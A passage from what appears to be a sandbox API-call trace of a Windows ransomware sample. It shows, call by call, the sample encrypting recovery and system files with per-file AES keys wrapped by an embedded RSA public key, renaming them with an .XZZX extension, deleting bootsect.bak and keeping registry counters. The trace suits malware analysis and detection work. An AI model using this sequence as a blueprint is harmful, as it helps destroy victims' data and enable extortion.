MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0032.170] OutputDebugStringW (lpOutputString="end") [0032.170] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----w\x98ÅÝ\x03`Õø\x03â", cchString=0x0, dwFlags=0x0, pbBinary=0x3f8dbf4, pcbBinary=0x3f8d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3f8dbf4, pcbBinary=0x3f8d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0032.170] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x3f8dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x3f8d3dc, pcbStructInfo=0x3f8d3d8 | out: pvStructInfo=0x3f8d3dc, pcbStructInfo=0x3f8d3d8) returned 1 [0032.175] CryptAcquireContextW (in: phProv=0x3f8d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3f8d3e4*=0x3ea078) returned 1 [0032.175] CryptImportPublicKeyInfo (in: hCryptProv=0x3ea078, dwCertEncodingType=0x1, pInfo=0x3dd0fb8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3dd0fe8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3dd0ff0*, PublicKey.cUnusedBits=0x0), phKey=0x3f8d3ec | out: phKey=0x3f8d3ec*=0x3246f8) returned 1 [0032.176] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0032.177] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0032.177] CryptEncrypt (in: hKey=0x3246f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3f8d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x3f8d3f0*=0x80) returned 1 [0032.177] CryptEncrypt (in: hKey=0x3246f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3ea188*, pdwDataLen=0x3f8d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3ea188*, pdwDataLen=0x3f8d3e8*=0x80) returned 1 [0032.177] WriteFile (in: hFile=0x2f8, lpBuffer=0x3ea188*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x3f8e438, lpOverlapped=0x0 | out: lpBuffer=0x3ea188*, lpNumberOfBytesWritten=0x3f8e438*=0x80, lpOverlapped=0x0) returned 1 [0032.177] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0032.177] WriteFile (in: hFile=0x2f8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x3f8e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x3f8e438*=0x5, lpOverlapped=0x0) returned 1 [0032.177] GetUserNameW (in: lpBuffer=0x3f8e1f8, pcbBuffer=0x3f8dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x3f8dfe0) returned 1 [0032.178] wsprintfW (in: param_1=0x3f8dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0032.178] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x3f8dfe4 | out: phkResult=0x3f8dfe4*=0x368) returned 0x0 [0032.178] RegQueryValueExW (in: hKey=0x368, lpValueName="E1010314", lpReserved=0x0, lpType=0x3f8dfd8, lpData=0x3f8dfec, lpcbData=0x3f8dfdc*=0x4 | out: lpType=0x3f8dfd8*=0x0, lpData=0x3f8dfec*=0x0, lpcbData=0x3f8dfdc*=0x4) returned 0x2 [0032.178] RegCloseKey (hKey=0x368) returned 0x0 [0032.178] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x3f8dfe8 | out: phkResult=0x3f8dfe8*=0x368) returned 0x0 [0032.178] RegSetValueExW (in: hKey=0x368, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x3f8dfec*=0x1, cbData=0x4 | out: lpData=0x3f8dfec*=0x1) returned 0x0 [0032.178] RegCloseKey (hKey=0x368) returned 0x0 [0032.178] VirtualFree (lpAddress=0x4080000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0032.179] VirtualFree (lpAddress=0x4090000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0032.179] CloseHandle (hObject=0x2f8) returned 1 [0032.180] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0032.181] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0032.181] DeleteFileW (lpFileName="\\\\?\\C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak")) returned 1 [0032.181] DeleteFileW (lpFileName="\\\\?\\C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak")) returned 0 Thread: id = 84 os_tid = 0xbf8 [0032.100] lstrcpyA (in: lpString1=0x42cfc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0032.100] lstrcpyW (in: lpString1=0x42cf460, lpString2="hiberfil.sys" | out: lpString1="hiberfil.sys") returned="hiberfil.sys" [0032.100] lstrcpyW (in: lpString1=0x42ce860, lpString2="\\\\?\\C:\\" | out: lpString1="\\\\?\\C:\\") returned="\\\\?\\C:\\" [0032.100] SetErrorMode (uMode=0x1) returned 0x1 [0032.100] lstrcpyW (in: lpString1=0x42cf860, lpString2="hiberfil.sys" | out: lpString1="hiberfil.sys") returned="hiberfil.sys" [0032.100] CoCreateGuid (in: pguid=0x42ce440 | out: pguid=0x42ce440*(Data1=0x10e1c3d9, Data2=0xf8a4, Data3=0x4f26, Data4=([0]=0xa3, [1]=0x4a, [2]=0xd9, [3]=0x71, [4]=0xce, [5]=0x63, [6]=0x9a, [7]=0xbe))) returned 0x0 [0032.100] wsprintfW (in: param_1=0x42cec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\hiberfil.sys") returned 19 [0032.100] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x42cfee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0032.100] wsprintfW (in: param_1=0x42ce450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\865BAF044CDF845810E1C3D9510C68A0.XZZX") returned 44 [0032.100] StrStrW (lpFirst="hiberfil.sys", lpSrch="XZZX") returned 0x0 [0032.100] SetFileAttributesW (lpFileName="\\\\?\\C:\\hiberfil.sys", dwFileAttributes=0x20) returned 0 [0032.100] CreateFileW (lpFileName="\\\\?\\C:\\hiberfil.sys" (normalized: "c:\\hiberfil.sys"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 85 os_tid = 0xbfc [0032.242] lstrcpyA (in: lpString1=0x3f8fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0032.242] lstrcpyW (in: lpString1=0x3f8f460, lpString2="pagefile.sys" | out: lpString1="pagefile.sys") returned="pagefile.sys" [0032.242] lstrcpyW (in: lpString1=0x3f8e860, lpString2="\\\\?\\C:\\" | out: lpString1="\\\\?\\C:\\") returned="\\\\?\\C:\\" [0032.243] SetErrorMode (uMode=0x1) returned 0x1 [0032.243] lstrcpyW (in: lpString1=0x3f8f860, lpString2="pagefile.sys" | out: lpString1="pagefile.sys") returned="pagefile.sys" [0032.243] CoCreateGuid (in: pguid=0x3f8e440 | out: pguid=0x3f8e440*(Data1=0xc19e71df, Data2=0x47b8, Data3=0x45f6, Data4=([0]=0x96, [1]=0xf7, [2]=0xaf, [3]=0x9a, [4]=0xa5, [5]=0x2a, [6]=0xf6, [7]=0xb2))) returned 0x0 [0032.243] wsprintfW (in: param_1=0x3f8ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\pagefile.sys") returned 19 [0032.243] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x3f8fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0032.243] wsprintfW (in: param_1=0x3f8e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\1B76B148139982D0C19E71DF17926718.XZZX") returned 44 [0032.243] StrStrW (lpFirst="pagefile.sys", lpSrch="XZZX") returned 0x0 [0032.243] SetFileAttributesW (lpFileName="\\\\?\\C:\\pagefile.sys", dwFileAttributes=0x20) returned 0 [0032.243] CreateFileW (lpFileName="\\\\?\\C:\\pagefile.sys" (normalized: "c:\\pagefile.sys"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 86 os_tid = 0x804 [0032.445] lstrcpyA (in: lpString1=0x3f8fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0032.445] lstrcpyW (in: lpString1=0x3f8f460, lpString2="boot.sdi" | out: lpString1="boot.sdi") returned="boot.sdi" [0032.445] lstrcpyW (in: lpString1=0x3f8e860, lpString2="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\" | out: lpString1="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\") returned="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\" [0032.445] SetErrorMode (uMode=0x1) returned 0x1 [0032.445] lstrcpyW (in: lpString1=0x3f8f860, lpString2="boot.sdi" | out: lpString1="boot.sdi") returned="boot.sdi" [0032.445] CoCreateGuid (in: pguid=0x3f8e440 | out: pguid=0x3f8e440*(Data1=0xcfadc153, Data2=0x3d25, Data3=0x414a, Data4=([0]=0x93, [1]=0x0, [2]=0xb0, [3]=0x81, [4]=0x6a, [5]=0x4, [6]=0x33, [7]=0x72))) returned 0x0 [0032.445] wsprintfW (in: param_1=0x3f8ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi") returned 61 [0032.445] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x3f8fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0032.445] wsprintfW (in: param_1=0x3f8e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\6B2DB7FF0F9811B2CFADC1531390F5FA.XZZX") returned 90 [0032.445] StrStrW (lpFirst="boot.sdi", lpSrch="XZZX") returned 0x0 [0032.445] SetFileAttributesW (lpFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", dwFileAttributes=0x20) returned 1 [0032.447] CreateFileW (lpFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390 [0032.448] CreateFileMappingW (hFile=0x390, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x394 [0032.448] MapViewOfFile (hFileMappingObject=0x394, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2dc6c0) returned 0x41d0000 [0032.449] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x4080000 [0032.450] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x4090000 [0032.450] SetErrorMode (uMode=0x1) returned 0x1 [0032.450] lstrcpyW (in: lpString1=0x3f8e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0032.450] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3ea100) returned 1 [0032.467] CryptGenKey (in: hProv=0x3ea100, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x324738) returned 1 [0032.592] CryptExportKey (in: hKey=0x324738, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x3f8e420 | out: pbData=0x0*, pdwDataLen=0x3f8e420*=0x94) returned 1 [0032.592] CryptExportKey (in: hKey=0x324738, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x4090000, pdwDataLen=0x3f8e420 | out: pbData=0x4090000*, pdwDataLen=0x3f8e420*=0x94) returned 1 [0032.592] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0032.593] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0032.593] CryptDestroyKey (hKey=0x324738) returned 1 [0032.593] CryptReleaseContext (hProv=0x3ea100, dwFlags=0x0) returned 1 [0032.959] UnmapViewOfFile (lpBaseAddress=0x41d0000) returned 1 [0032.977] CloseHandle (hObject=0x394) returned 1 [0032.977] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x306000 [0032.977] WriteFile (in: hFile=0x390, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x3f8e42c, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x3f8e42c*=0x5, lpOverlapped=0x0) returned 1 [0032.977] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x306005 [0032.978] WriteFile (in: hFile=0x390, lpBuffer=0x3f8f860*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x3f8e42c, lpOverlapped=0x0 | out: lpBuffer=0x3f8f860*, lpNumberOfBytesWritten=0x3f8e42c*=0x10, lpOverlapped=0x0) returned 1 [0032.978] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x306015 [0032.978] WriteFile (in: hFile=0x390, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x3f8e42c, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x3f8e42c*=0x5, lpOverlapped=0x0) returned 1 [0032.978] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0032.978] SetErrorMode (uMode=0x1) returned 0x1 [0032.978] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0032.978] OutputDebugStringW (lpOutputString="end") [0032.978] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wX\x934", cchString=0x0, dwFlags=0x0, pbBinary=0x3f8dbf4, pcbBinary=0x3f8d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3f8dbf4, pcbBinary=0x3f8d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0032.978] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x3f8dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x3f8d3dc, pcbStructInfo=0x3f8d3d8 | out: pvStructInfo=0x3f8d3dc, pcbStructInfo=0x3f8d3d8) returned 1 [0032.978] CryptAcquireContextW (in: phProv=0x3f8d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3f8d3e4*=0x3ea298) returned 1 [0032.979] CryptImportPublicKeyInfo (in: hCryptProv=0x3ea298, dwCertEncodingType=0x1, pInfo=0x3dd12f8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3dd1328*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3dd1330*, PublicKey.cUnusedBits=0x0), phKey=0x3f8d3ec | out: phKey=0x3f8d3ec*=0x3247b8) returned 1 [0032.979] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0032.979] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0032.979] CryptEncrypt (in: hKey=0x3247b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3f8d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x3f8d3f0*=0x80) returned 1 [0032.979] CryptEncrypt (in: hKey=0x3247b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3ea320*, pdwDataLen=0x3f8d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3ea320*, pdwDataLen=0x3f8d3e8*=0x80) returned 1 [0032.979] OutputDebugStringW (lpOutputString="Ȇ") [0032.979] WriteFile (in: hFile=0x390, lpBuffer=0x3ea320*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x3f8e42c, lpOverlapped=0x0 | out: lpBuffer=0x3ea320*, lpNumberOfBytesWritten=0x3f8e42c*=0x80, lpOverlapped=0x0) returned 1 [0032.980] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0032.980] WriteFile (in: hFile=0x390, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x3f8e42c, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x3f8e42c*=0x5, lpOverlapped=0x0) returned 1 [0032.980] CloseHandle (hObject=0x390) returned 1 [0033.041] VirtualFree (lpAddress=0x4080000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0033.042] VirtualFree (lpAddress=0x4090000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0033.043] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi"), lpNewFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\6B2DB7FF0F9811B2CFADC1531390F5FA.XZZX" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\6b2db7ff0f9811b2cfadc1531390f5fa.xzzx"), dwFlags=0x1) returned 1 [0033.044] GetUserNameW (in: lpBuffer=0x3f8e1f8, pcbBuffer=0x3f8dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x3f8dfe0) returned 1 [0033.046] wsprintfW (in: param_1=0x3f8dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0033.046] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x3f8dfe4 | out: phkResult=0x3f8dfe4*=0x390) returned 0x0 [0033.046] RegQueryValueExW (in: hKey=0x390, lpValueName="E1010314", lpReserved=0x0, lpType=0x3f8dfd8, lpData=0x3f8dfec, lpcbData=0x3f8dfdc*=0x4 | out: lpType=0x3f8dfd8*=0x4, lpData=0x3f8dfec*=0x2, lpcbData=0x3f8dfdc*=0x4) returned 0x0 [0033.046] RegCloseKey (hKey=0x390) returned 0x0 [0033.046] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x3f8dfe8 | out: phkResult=0x3f8dfe8*=0x390) returned 0x0 [0033.046] RegSetValueExW (in: hKey=0x390, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x3f8dfec*=0x3, cbData=0x4 | out: lpData=0x3f8dfec*=0x3) returned 0x0 [0033.046] RegCloseKey (hKey=0x390) returned 0x0 Thread: id = 87 os_tid = 0x814 [0032.601] lstrcpyA (in: lpString1=0x45afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0032.601] lstrcpyW (in: lpString1=0x45af460, lpString2="Winre.wim" | out: lpString1="Winre.wim") returned="Winre.wim" [0032.601] lstrcpyW (in: lpString1=0x45ae860, lpString2="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\" | out: lpString1="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\") returned="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\" [0032.601] SetErrorMode (uMode=0x1) returned 0x1 [0032.602] lstrcpyW (in: lpString1=0x45af860, lpString2="Winre.wim" | out: lpString1="Winre.wim") returned="Winre.wim" [0032.602] CoCreateGuid (in: pguid=0x45ae440 | out: pguid=0x45ae440*(Data1=0x630c5931, Data2=0x33f, Data3=0x4ac1, Data4=([0]=0x9b, [1]=0xce, [2]=0x6a, [3]=0x5e, [4]=0xd2, [5]=0xcb, [6]=0xdc, [7]=0xa6))) returned 0x0 [0032.602] wsprintfW (in: param_1=0x45aec60, param_2="%s%s" | out: 